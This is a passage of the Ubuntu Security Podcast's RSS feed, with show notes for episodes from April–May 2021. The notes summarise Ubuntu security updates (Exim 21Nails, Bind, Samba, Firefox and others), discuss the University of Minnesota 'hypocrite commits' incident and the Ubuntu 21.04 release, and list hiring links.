<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring-11-47">Hiring [11:47]</h3>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E115.mp3" length="10470335" type="audio/mpeg" /><itunes:duration>12:44</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 114
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-114/</link>
          <pubDate>Fri, 07 May 2021 00:03:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>1ad3c582bda6db97671c4cee2689d3b8d9fefc3ef5ad90094f91f7dec3b9d71c64f51ec90386259923d0fd0cf4fd9ed9e6fcf7795d13b82d95d902cd05548483</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 114</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at the response from the Linux Technical Advisory Board
  to the UMN Linux kernel incident, plus we cover the 21Nails Exim
  vulnerabilities as well as updates for Bind, Samba, OpenVPN and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at the response from the Linux Technical Advisory Board
  to the UMN Linux kernel incident, plus we cover the 21Nails Exim
  vulnerabilities as well as updates for Bind, Samba, OpenVPN and more.
  </itunes:summary>
        <description>  This week we look at the response from the Linux Technical Advisory Board
  to the UMN Linux kernel incident, plus we cover the 21Nails Exim
  vulnerabilities as well as updates for Bind, Samba, OpenVPN and more.
  </description>
        <googleplay:description>  This week we look at the response from the Linux Technical Advisory Board
  to the UMN Linux kernel incident, plus we cover the 21Nails Exim
  vulnerabilities as well as updates for Bind, Samba, OpenVPN and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at the response from the Linux Technical Advisory Board
to the UMN Linux kernel incident, plus we cover the 21Nails Exim
vulnerabilities as well as updates for Bind, Samba, OpenVPN and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>40 unique CVEs addressed</p>
<h3 id="usn-4928-1-gstreamer-good-plugins-vulnerabilities-00-40">[<a href="https://ubuntu.com/security/notices/USN-4928-1">USN-4928-1</a>] GStreamer Good Plugins vulnerabilities [00:40]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3498">CVE-2021-3498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3497">CVE-2021-3497</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF or heap corruption when handling crafted Matroska files - crash / RCE</li>
</ul>
<h3 id="usn-4929-1-bind-vulnerabilities-01-18">[<a href="https://ubuntu.com/security/notices/USN-4929-1">USN-4929-1</a>] Bind vulnerabilities [01:18]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25216">CVE-2021-25216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25215">CVE-2021-25215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25214">CVE-2021-25214</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 possible crasher bugs (failed assertions) -&gt; DoS, 1 buffer over-read or
possible overflow -&gt; crash / RCE</li>
</ul>
<h3 id="usn-4930-1-samba-vulnerability-02-08">[<a href="https://ubuntu.com/security/notices/USN-4930-1">USN-4930-1</a>] Samba vulnerability [02:08]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20254">CVE-2021-20254</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly handle negative idmap cache entries - could then end
up with incorrect group entries and as such could possibly allow a user
to access / modify files they should not have access to</li>
</ul>
<h3 id="usn-4931-1-samba-vulnerabilities-02-51">[<a href="https://ubuntu.com/security/notices/USN-4931-1">USN-4931-1</a>] Samba vulnerabilities [02:51]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20254">CVE-2021-20254</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14383">CVE-2020-14383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14323">CVE-2020-14323</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14318">CVE-2020-14318</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>negative idmap cache entries issue plus some older vulns (<a href="https://ubuntusecuritypodcast.org/episode-95/">Episode 95</a>)</li>
</ul>
<h3 id="lsn-0076-1-linux-kernel-vulnerability-03-03">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2021-May/005996.html">LSN-0076-1</a>] Linux kernel vulnerability [03:03]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29154">CVE-2021-29154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3493">CVE-2021-3493</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 local user privesc vulns fixed:
<ul>
<li>BPF JIT branch displacement issue (<a href="https://ubuntusecuritypodcast.org/episode-112/">Episode 112</a>)</li>
<li>Overlayfs / file system capabilities interaction</li>
</ul>
</li>
</ul>
<h3 id="usn-4918-3-clamav-regression-03-52">[<a href="https://ubuntu.com/security/notices/USN-4918-3">USN-4918-3</a>] ClamAV regression [03:52]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-1405">CVE-2021-1405</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1404">CVE-2021-1404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1252">CVE-2021-1252</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Previous clamav update (back in April <!-- raw HTML omitted -->) introduced a regression where clamdscan
would crash if called with &ndash;multiscan and &ndash;fdpass AND you had an
ExcludePath configured in the configuration - backported the upstream
commit from the development branch to fix this</li>
</ul>
<h3 id="usn-4932-1-django-vulnerability-04-30">[<a href="https://ubuntu.com/security/notices/USN-4932-1">USN-4932-1</a>] Django vulnerability [04:30]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31542">CVE-2021-31542</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Directory traversal via uploaded files with crafted names</li>
</ul>
<h3 id="usn-4933-1-openvpn-vulnerabilities-04-47">[<a href="https://ubuntu.com/security/notices/USN-4933-1">USN-4933-1</a>] OpenVPN vulnerabilities [04:47]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15078">CVE-2020-15078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11810">CVE-2020-11810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Race condition in handling of data packets could allow an attacker to
inject a packet using a victim&rsquo;s peer-id before the crypto channel is
properly initialised - could cause the victim&rsquo;s connection to be dropped
(DoS) but doesn&rsquo;t appear to expose any sensitive info etc</li>
<li>Attackers could possibly bypass auth on control channel and hence leak info</li>
</ul>
<h3 id="usn-4934-1-exim-vulnerabilities-05-39">[<a href="https://ubuntu.com/security/notices/USN-4934-1">USN-4934-1</a>] Exim vulnerabilities [05:39]</h3>
<ul>
<li>21 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27216">CVE-2021-27216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28026">CVE-2020-28026</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28025">CVE-2020-28025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28024">CVE-2020-28024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28023">CVE-2020-28023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28022">CVE-2020-28022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28021">CVE-2020-28021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28020">CVE-2020-28020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28019">CVE-2020-28019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28018">CVE-2020-28018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28017">CVE-2020-28017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28016">CVE-2020-28016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28015">CVE-2020-28015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28014">CVE-2020-28014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28013">CVE-2020-28013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28012">CVE-2020-28012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28011">CVE-2020-28011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28010">CVE-2020-28010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28009">CVE-2020-28009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28008">CVE-2020-28008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28007">CVE-2020-28007</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Qualsys - <a href="https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server">21Nails</a> - various vulns which could be chained together to get
full remote unauthenticated RCE and root privesc
<ul>
<li><a href="https://www.qualys.com/2021/05/04/21nails/21nails.txt">Full write-up</a></li>
</ul>
</li>
<li>Possibly 60% of internet mail servers run exim and 4 million are publicly
accessible</li>
<li><a href="https://www.bleepingcomputer.com/news/security/nsa-russian-govt-hackers-exploiting-critical-exim-flaw-since-2019/">Previously has been a target of Sandworm</a></li>
<li>In the process of preparing the updates for 16.04 / 14.04 ESM - expect to
be available in the next day or 2 so most likely will already be out by
the time you are listening to this</li>
</ul>
<h3 id="usn-4935-1-nvidia-graphics-drivers-vulnerabilities-07-58">[<a href="https://ubuntu.com/security/notices/USN-4935-1">USN-4935-1</a>] NVIDIA graphics drivers vulnerabilities [07:58]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-1077">CVE-2021-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-1076">CVE-2021-1076</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Not much detail from NVIDIA
<ul>
<li>improper access control -&gt; DoS, infoleak or data corruption -&gt; privesc etc</li>
<li>incorrect use of reference counting -&gt; DoS (crash?) (UAF?)</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-technical-advisory-board-response-to-umn-incident-08-56">Linux Technical Advisory Board response to UMN incident [08:56]</h3>
<ul>
<li>Covered in <a href="https://ubuntusecuritypodcast.org/episode-113/">Episode 113</a></li>
<li><a href="https://lore.kernel.org/lkml/202105051005.49BFABCE@keescook/">https://lore.kernel.org/lkml/202105051005.49BFABCE@keescook/</a></li>
<li>Kees Cook (previously inaugural Tech Lead of Ubuntu Security Team) posted
to LKML the Tab&rsquo;s report (various folks from across the Linux Kernel
community, including from Red Hat, Google, Canonical and others)</li>
<li>Detailed timeline of events, identification of the &ldquo;hypocrite&rdquo; commits in
question</li>
<li>Recommendations going forward
<ul>
<li>UMN must improve quality of their submissions since even for a lot of
what were good-faith patches, they actually had issues and either
didn&rsquo;t fix the purported issue or tried to fix a non-issue</li>
<li>TAB will create a best-practices document for all research groups when
working with the kernel or other open source projects</li>
</ul>
</li>
</ul>
<h3 id="hiring-11-36">Hiring [11:36]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847/apparmor-security-engineer-remote">https://canonical.com/careers/2114847/apparmor-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E114.mp3" length="10096965" type="audio/mpeg" /><itunes:duration>12:44</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 113
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-113/</link>
          <pubDate>Fri, 30 Apr 2021 14:33:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>4cf1fb7128e92aa989b8461391b0e737610b4c789c116b67292134e5b4a0d8b994ef77c40086bb1d933b6b49e2ba8436456c53504c2f95fe3c613014519778fc</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 113</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          With 21 CVEs fixed this week we look at updates for Dnsmasq, Firefox,
  OpenJDK and more, plus we discuss the recent release of Ubuntu 21.04 and
  malicious commits in the upstream Linux kernel.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  With 21 CVEs fixed this week we look at updates for Dnsmasq, Firefox,
  OpenJDK and more, plus we discuss the recent release of Ubuntu 21.04 and
  malicious commits in the upstream Linux kernel.
  </itunes:summary>
        <description>  With 21 CVEs fixed this week we look at updates for Dnsmasq, Firefox,
  OpenJDK and more, plus we discuss the recent release of Ubuntu 21.04 and
  malicious commits in the upstream Linux kernel.
  </description>
        <googleplay:description>  With 21 CVEs fixed this week we look at updates for Dnsmasq, Firefox,
  OpenJDK and more, plus we discuss the recent release of Ubuntu 21.04 and
  malicious commits in the upstream Linux kernel.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>With 21 CVEs fixed this week we look at updates for Dnsmasq, Firefox,
OpenJDK and more, plus we discuss the recent release of Ubuntu 21.04 and
malicious commits in the upstream Linux kernel.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>21 unique CVEs addressed</p>
<h3 id="usn-4916-2-linux-kernel-regression-00-48">[<a href="https://ubuntu.com/security/notices/USN-4916-2">USN-4916-2</a>] Linux kernel regression [00:48]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29154">CVE-2021-29154</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3493">CVE-2021-3493</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible memory leak introduced via fix for overlayfs priv esc vuln - so
the fix effectively introduced a new vuln but only a DoS not priv esc</li>
</ul>
<h3 id="usn-4924-1-dnsmasq-vulnerabilities-01-17">[<a href="https://ubuntu.com/security/notices/USN-4924-1">USN-4924-1</a>] Dnsmasq vulnerabilities [01:17]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14513">CVE-2019-14513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15107">CVE-2017-15107</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 DoS issues, one possible OOB read -&gt; crash, the other a trust issue
where for DNSSEC configurations could end up having dnsmasq prove the
non-existence of hostnames that actually exist - so again a DoS but not
in the traditional sense</li>
</ul>
<h3 id="usn-4925-1-shibboleth-vulnerability-01-57">[<a href="https://ubuntu.com/security/notices/USN-4925-1">USN-4925-1</a>] Shibboleth vulnerability [01:57]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28963">CVE-2021-28963</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SSO solution for InCommon Federation system</li>
<li>Possible content injection bug in error or other pages since template
generation would use attacker controlled inputs</li>
</ul>
<h3 id="usn-4926-1-firefox-vulnerabilities-02-19">[<a href="https://ubuntu.com/security/notices/USN-4926-1">USN-4926-1</a>] Firefox vulnerabilities [02:19]</h3>
<ul>
<li>12 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Groovy (20.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-24002">CVE-2021-24002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23995">CVE-2021-23995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29947">CVE-2021-29947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29946">CVE-2021-29946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29945">CVE-2021-29945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-24001">CVE-2021-24001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-24000">CVE-2021-24000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23999">CVE-2021-23999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23998">CVE-2021-23998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23997">CVE-2021-23997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23996">CVE-2021-23996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23994">CVE-2021-23994</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>88.0</li>
<li>Usual web issues plus a possible UAF in responsive design mode as well as
an issue in FTP client where specially crafted FTP URL (ie one containing
newlines) could embed FTP commands and cause the client to execute
arbitrary FTP commands to the server
<ul>
<li>FTP client in Firefox is deprecated and disabled by default now -
expected to be removed in a future release</li>
</ul>
</li>
</ul>
<h3 id="usn-4927-1-file-roller-vulnerability-03-46">[<a href="https://ubuntu.com/security/notices/USN-4927-1">USN-4927-1</a>] File Roller vulnerability [03:46]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36314">CVE-2020-36314</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incomplete fix for previous CVE-2020-11736 (<a href="https://ubuntusecuritypodcast.org/episode-72/">Episode 72</a>) - directory
traversal via symlink issue on extraction of archives</li>
</ul>
<h3 id="usn-4892-1-openjdk-vulnerability-04-15">[<a href="https://ubuntu.com/security/notices/USN-4892-1">USN-4892-1</a>] OpenJDK vulnerability [04:15]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-2163">CVE-2021-2163</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream point release to fix an issue where would fail to
properly verify signatures on crafted JARs - could bypass security
restrictions if a JAR is signed with an algorithm that is disabled</li>
</ul>
<h3 id="usn-4922-2-ruby-vulnerability-04-35">[<a href="https://ubuntu.com/security/notices/USN-4922-2">USN-4922-2</a>] Ruby vulnerability [04:35]</h3>
<ul>
<li>1 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28965">CVE-2021-28965</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>First USN for Hirsute \o/</li>
<li>XML deserialisation issue</li>
</ul>
<h3 id="usn-4913-2-underscore-vulnerability-04-49">[<a href="https://ubuntu.com/security/notices/USN-4913-2">USN-4913-2</a>] Underscore vulnerability [04:49]</h3>
<ul>
<li>1 CVEs addressed in 21.04
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23358">CVE-2021-23358</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Code injection via template function due to failure to properly handle
untrusted input</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-21-dot-04-hirsute-hippo-released-05-05">Ubuntu 21.04 Hirsute Hippo Released [05:05]</h3>
<ul>
<li>Standard support release, supported for 9 months</li>
<li>Private home dirs</li>
<li>Kernel 5.11
<ul>
<li>Stack protector for RISC-V</li>
<li>Improved performance for Spectre mitigations via static calls</li>
<li>Initial support for memory tagging for ARM64
<ul>
<li>Will require support in glibc etc but this is an initial start to
providing improved protection against memory corruption vulns</li>
</ul>
</li>
</ul>
</li>
<li>OpenSSH 8.4
<ul>
<li>Improved support for FIDO/U2F keys for 2FA</li>
</ul>
</li>
</ul>
<h3 id="hypocrite-commits-and-the-upstream-linux-kernel-07-38">Hypocrite commits and the upstream Linux kernel [07:38]</h3>
<ul>
<li>First came to light in November 2020 when one of the authors of a paper
from University of Minnesota tweeted about the acceptance of their paper
to IEEE S&amp;P 2021 - this showed the first page of the paper and seemed to
indicate that for the purposes of academic research a number of malicious
commits (ie commits that when added to the kernel would create a
vulnerability) had been introduced into the upstream kernel.</li>
<li>Lots of blowback at the time amongst both <a href="https://twitter.com/SarahJamieLewis/status/1330618919376228352">kernel devs</a>, <a href="https://twitter.com/tobycmurray/status/1330704953891979268">other researchers</a>
etc regarding both the ethics of effectively experimenting on subjects
without their consent and the concept of purposely introducing vulns just
for the sake of research purposes</li>
<li>The researchers claimed they followed these up with subsequent commits to
fix the vulns and so none actually would have made it to end users so
they thought it was effectively done</li>
<li>At this stage as a team we thought this was interesting but effectively
just demonstrating something that most folks in OSS always knew was a
potential reality - that once a contributor to a project builds a certain
level of trust it would be relatively easy to introduce vulns like this
in a stealthy manner and that the best defence would be better automated
review tooling (static/dynamic analysis via CI etc) rather than trying to
rely on human reviewers to detect</li>
<li>Issue again came to light recently when the <a href="https://github.com/QiushiWu/QiushiWu.github.io/blob/main/papers/OpenSourceInsecurity.pdf">paper</a> was made available in
full and it was revealed that 3 malicious commits were potentially
integrated into the upstream kernel - actually only 1 was ACKed and then
this was rejected and the other 2 were rejected outright.  Recently,
GregKH weighed in and effectively blacklisted all contributions from UMN
and proposed to revert all commits that had come from umn.edu authors</li>
<li>Not surprisingly, most of these were NOT malicious and so took careful
review by various developers to decide which should NOT be reverted as
lots of them did actually fix legitimate issues</li>
<li>Researchers then apologised and so only a few commits actually got
reverted as a result</li>
<li>In the end it highlights how OSS development is built on trust and how
this can be abused in either direction - tempting to jump to technical
solutions (ie better static analysis/CI etc) but this will never be
foolproof - also need the ability to move fast so can get say reverts
done and delivered to users, and also to build good relationships BUT in
the end need to still be wary - &ldquo;trust but verify&rdquo; - both on a technical
basis and also on a personal basis so we can better understand the
provenance of code etc
<!-- raw HTML omitted -->
</li>
</ul>
<h3 id="hiring-14-36">Hiring [14:36]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847/apparmor-security-engineer-remote">https://canonical.com/careers/2114847/apparmor-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="linux-cryptography-and-security-engineer">Linux Cryptography and Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote">https://canonical.com/careers/2612092/linux-cryptography-and-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E113.mp3" length="12103984" type="audio/mpeg" /><itunes:duration>16:28</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 112
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-112/</link>
          <pubDate>Fri, 16 Apr 2021 17:18:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>04d09ee2bd28b15449ad702b4be3a0f94884523c0eb8f3febcc9d72aaf01269d3eb6370c9be35df627b191aaf6814601591578ac8cc1781bdb6df35b8173f64e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 112</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at a reboot of the DWF project, Rust in the Linux kernel,
  an Ubuntu security webinar plus some details of the 45 CVEs addressed
  across the Ubuntu releases this last week and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at a reboot of the DWF project, Rust in the Linux kernel,
  an Ubuntu security webinar plus some details of the 45 CVEs addressed
  across the Ubuntu releases this last week and more.
  </itunes:summary>
        <description>  This week we look at a reboot of the DWF project, Rust in the Linux kernel,
